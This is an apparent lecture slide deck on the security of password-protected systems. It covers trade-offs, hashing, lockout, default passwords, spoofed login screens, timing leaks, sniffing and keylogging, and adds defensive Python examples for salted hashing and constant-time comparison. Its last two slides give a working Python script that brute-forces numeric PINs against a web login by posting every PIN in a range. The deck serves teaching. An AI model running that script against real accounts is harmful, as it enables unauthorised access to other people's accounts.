Security of Password-protected systems - PowerPoint PPT Presentation

Slides: 17
Provided by: richar219
1
Security of Password-protected systems
  • Authentication means checking who is using your
    system. Password and PIN-based systems have
    become very popular, as these are easy and cheap
    to design and use compared to the alternatives.
    Very many systems use passwords. Even if better
    approaches exist, passwords will be used for many
    years to come. Someone responsible for systems
    security is likely to want to achieve the best
    performance from this kind of system.

2
Advantages to System Operator 1
  • Users don't need to carry physical tokens.
    Passwords are based on what the users know.
  • Passwords don't require special hardware.
    Providing special hardware for all the computers
    in an organisation, or for all system users is
    expensive.
  • Having a password to get into something
    provides a boundary where those not authorised
    are almost certain to go away. Coming to a locked
    door that could be forced has a similar effect.
  • If a password is difficult to remember, the
    cost of remembering it is carried by the user, as
    opposed to the system provider.

3
Advantages to System Operator 2
  • If a user forgets a password, reissue could be
    automated, e.g. if you know the email address of
    the user. If this can't be automated, the
    reissuing cost can still be charged to the user
    in some cases.
  • For systems requiring greater security,
    passwords can be one component of a multi-factor
    authentication system, e.g. such a system might
    require both a password and a one-time number
    sent as an SMS message to the user's mobile.
  • A password system can be software upgraded
    without requiring hardware changes.

4
Disadvantages 1
  • People choose passwords which are easy to
    guess. Reissue hints based on Mother's maiden
    name are as bad.
  • Shoulder surfing, mobile phone and other video
    cameras ...
  • For someone who hides their fingers, keyboards
    can usually be modified anyway ...
  • People have to remember too many passwords, so
    are likely to write them down, or use the same
    password in many different systems.

5
Disadvantages 2
  • When someone with access to your password in
    one system finds out or guesses which other
    online systems you use, they have a very good
    chance of getting into these other systems.
  • When there are very many systems using
    passwords, there are too many insiders able to
    discover a password used on many systems.
  • People find it difficult to input a long and/or
    complex password without making errors.

6
Design improvements 1
  • The design and implementation cost for these
    precautions is small, but they impact usability
    for some people.
  • Not echoing the password when it is input on a
    screen. This trades off against poor typing
    skills of some users who find accurate data entry
    difficult.
  • Choosing the password for the user, rather than
    allowing the user to choose it. This increases
    unpredictability, but also the chance that the
    password is forgotten.
  • Forcing password changes, e.g. monthly or
    yearly. This also increases the probability that a
    new password will be forgotten. It reduces the risk
    of a password being used by an attacker, and the
    time for which a compromised password remains
    usable.

7
Design improvements 2
  • Hashing the password, both as stored on the
    system and when input, using a one-way scrambling
    algorithm. This protects plain text passwords to
    some extent. It makes it impossible to reissue the
    same password if the user forgets it. A slow
    hashing algorithm can be chosen.
  • Locking out a user account after a certain
    number of failed attempts. This can defeat
    guessing of the most popular passwords, e.g. name
    of spouse or football team, but risks locking out
    users with clumsy typing. Also risks a denial of
    service attack, e.g. if the only accounts used to
    login to a remote server are periodically
    attacked over the Internet.
  • Making user account names unpredictable. This
    protects the secret password with an obscure
    username. The trade off is that the username is
    more likely to be forgotten.
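Added example (not from the slides): storing a password with a slow, salted hash and verifying it, as slide 7 describes. PBKDF2-HMAC-SHA256, the iteration count and the salt length are assumed choices; the slides name no particular algorithm.

```python
import hashlib
import hmac
import os

# Assumed parameters (not from the slides): PBKDF2-HMAC-SHA256 with a high
# iteration count makes every guess against a stolen hash file expensive.
ITERATIONS = 200_000
SALT_BYTES = 16


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return (salt, iterations, digest) to store; the plaintext is never kept."""
    if salt is None:
        # A fresh salt per user means equal passwords do not share a digest.
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, iterations, digest


def verify_password(password, stored):
    """Recompute the slow hash with the stored salt and compare in constant time."""
    salt, iterations, digest = stored
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    # compare_digest avoids the position-dependent delay discussed on slide 11.
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")  # constructed demo password
    print(verify_password("correct horse battery staple", record))  # True
    print(verify_password("Correct horse battery staple", record))  # False
```

Because only the digest is stored, a forgotten password cannot be sent back to the user; it can only be replaced, which is the reissue limitation the slide notes.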

8
Default passwords
  • If you are designing a system to manufacture or
    distribute (e.g. via CD-ROM or software download)
    to users you might have to set the initial system
    administration passwords. It will be cheaper if
    all initial passwords are the same.
  • A better approach is to require the installer to
    choose a password when using the installation
    program, or perhaps, for a broadband router, to
    set its password to the serial number of the
    router - so long as the IP address of the
    installation is unknown to the distributor and
    logging in with the serial number is not made
    accessible by default on the external network
    interface.
  • There is a conflict of interest, in that
    manufacturers and distributors want to minimise
    support costs.

9
Who loses if it breaks?
  • A student who leaves his password written down in
    an empty room might lose data, or more likely its
    confidentiality. This provides an incentive to
    keep the password secret.
  • Users who are unlikely to be affected are more
    likely to compromise good practice in pursuit of
    convenience. Having Bob Cracker impersonate Alice
    Scholar affects other users' interests through
    use of Alice's account to attack connected
    systems. If discovered, the attack will be blamed
    on Alice. On a system where all you need to get
    an account is an email address on another system,
    there is little incentive to protect the
    credentials.
  • If a privilege escalation attack can be launched,
    Bob only needs to break the security on one
    account out of thousands, so in this situation
    everyone who uses this network could lose if only
    one account is vulnerable.

10
The bogus system
  • How do you know, when you input a password to a
    system, that the system isn't bogus?
  • Windows XP requires use of the control, alt and
    del keys prior to inputting a password, and makes
    it difficult to create an application which will
    trap this key combination. This doesn't prevent
    someone from booting another operating system
    from CD and presenting a password input sequence
    which looks just like Windows XP.
  • This attack keeps getting repeated in new
    contexts - e.g. thieves installing bogus ATMs to
    skim credit cards and PINs.

11
Variable response delays
  • This is similar to the old bicycle combination
    lock attack that relies on differences in feel of
    each of 4 rotors as its open point is passed. If
    the delay in getting a "wrong password" message
    depends upon which character position tests wrong,
    this gives an attacker opportunities to get each
    of 8 characters in a password right before trying
    the others, greatly reducing the number of failed
    attempts needed.
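Added example illustrating the delay leak, not part of the deck: a check that stops at the first wrong character reveals how many leading positions matched (counted here as comparison steps rather than measured as time), while a constant-time comparison gives no such signal. The 8-character password and the guesses are constructed for the demo.

```python
import hmac


def leaky_check(secret, guess):
    """Character-by-character check that stops at the first mismatch.
    Returns (matched, steps): steps grows with the length of the correct
    prefix, which is the position-dependent delay the slide describes."""
    steps = 0
    if len(secret) != len(guess):
        return False, steps
    for a, b in zip(secret, guess):
        steps += 1
        if a != b:
            return False, steps
    return True, steps


def constant_time_check(secret, guess):
    """Compare the whole value regardless of where it differs.
    hmac.compare_digest is the standard library's constant-time comparison."""
    return hmac.compare_digest(secret.encode("utf-8"), guess.encode("utf-8"))


def prefix_leak(secret, guesses):
    """Defender's self-test: count the distinct step totals the leaky check
    exposes over a set of wrong guesses. More than one means the response
    time depends on the mismatch position."""
    return len({leaky_check(secret, g)[1] for g in guesses})


if __name__ == "__main__":
    secret = "s3cr3tpw"                                # constructed password
    wrong = ["a3cr3tpw", "s3xr3tpw", "s3cr3tpx"]       # differ at positions 1, 3, 8
    for g in wrong:
        print(g, leaky_check(secret, g))              # steps 1, 3 and 8
    print(prefix_leak(secret, wrong))                 # 3 distinct timings
    print([constant_time_check(secret, g) for g in wrong])  # all False, nothing to time
```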

12
Passing plaintext passwords over the wire
  • If a user's credentials on a client are passed to
    a server over the network connection, security of
    this system depends upon preventing someone from
    sniffing the wire. Early versions of Sun's
    Network File System and Microsoft's similar SMB
    protocol are vulnerable. For various reasons,
    these old configurations persist long after the
    replacement technology becomes available.

13
Keylogging
  • If the keys all sound exactly the same or draw
    exactly the same current from the power supply,
    or if an attacker only has network access to a
    system with a keyboard, it could still be
    possible for an attacker to install a program
    that logs the keystrokes. Then again the keyboard
    usually looks standard and could be replaced with
    one that looks the same but isn't.

14
Brute force
  • A system that will defeat a casual user who
    inputs passwords manually might be easily
    defeated by a script that simulates a user.
    Programs such as wget are designed to be able to
    automate any HTTP request.
  • A 4 digit PIN protected system only requires a
    loop to run 10,000 times - though 4 digit PINs
    tend not to start with a '0', reducing the
    keyspace to 9,000. The best possible 8 character
    passwords using any of 96 easily input characters
    allow for about 2^52 combinations. If the hash
    file is available, this number is subject to attack
    using a network of new computers and a few days to
    run through all the possible passwords.
  • In practice few actual passwords are chosen from
    such a large set. A password which is in a
    spelling dictionary might be broken in less than
    2^16 attempts.
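Added example, not from the slides: the keyspace arithmetic above, and a model of the lockout rule from slide 7 applied to the PIN loop that slides 15 and 16 describe, so a defender can see how much of the keyspace an automated run covers before the lock fires. The guessing rate, the lockout threshold and the correct PIN are assumed values.

```python
import math


def keyspace(alphabet_size, length):
    """Number of candidates and its size in bits, e.g. 96 characters x 8 positions."""
    n = alphabet_size ** length
    return n, math.log2(n)


def days_to_exhaust(candidates, guesses_per_second):
    """How long an offline attack on a stolen hash file needs to try every candidate."""
    return candidates / guesses_per_second / 86400


def guesses_until_lockout(candidates, max_failures, correct=None):
    """Model the slide's lockout rule: after max_failures consecutive wrong
    attempts the account locks and the online guessing loop is cut off.
    Returns (attempts_made, found)."""
    failures = 0
    attempts = 0
    for guess in candidates:
        attempts += 1
        if guess == correct:
            return attempts, True
        failures += 1
        if failures >= max_failures:
            return attempts, False
    return attempts, False


if __name__ == "__main__":
    total, bits = keyspace(96, 8)
    print(f"96^8 = {total:,} candidates, about 2^{bits:.1f}")  # about 2^52.7
    print(f"{days_to_exhaust(total, 1e10):.1f} days at an assumed 10^10 guesses/s")
    print(keyspace(10, 4)[0], "four-digit PINs; 9000 if a leading 0 is never used")
    # Constructed scenario: PINs 1000..9999 are tried in order as in the slide's
    # script, the correct PIN is 4321 and the system locks after 5 failures.
    pins = range(1000, 10000)
    print(guesses_until_lockout(pins, max_failures=5, correct=4321))      # (5, False)
    print(guesses_until_lockout(pins, max_failures=10_000, correct=4321)) # (3322, True)
```

With the lockout in place the whole 9,000-PIN range can only be covered by repeatedly locking the account, which is the denial-of-service side effect slide 7 warns about.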

15
Brute force attack script part 1
    #!/usr/bin/env python
    # script to brute force crack a web application using
    # numeric PINs by trying all of these in a range
    # (Python 2: raw_input, urllib2 and the print statement;
    # do_post is defined in part 2 and must precede this loop
    # when the two parts are placed in one file)
    user = raw_input("username of account to attack")
    startpin = int(raw_input("start PIN in range to attack e.g. 1000"))
    endpin = int(raw_input("end PIN in range to attack e.g. 9999"))
    url = raw_input("URL of web application to attack")
    for pin in range(startpin, endpin + 1):   # +1 so the end PIN is included
        do_post(user, pin, url)

16
Brute force attack script part 2
    def do_post(user, pin, url):
        ''' perform a single web authentication request, by doing a HTTP post
        operation on web server, and reports pass.
        This is based upon whether the result contains known error string
        (for a fail) or not (for a pass) '''
        import urllib2
        postdata = 'PIN=%s&user=%s' % (str(pin), user)
        req = urllib2.Request(url=url, data=postdata)
        fr = urllib2.urlopen(req)
        result = fr.read()
        if result.find('Incorrect account or PIN') >= 0:
            # failed to login if error returned
            pass
        else:
            print 'cracked PIN %d\n account %s\n url %s' % (pin, user, url)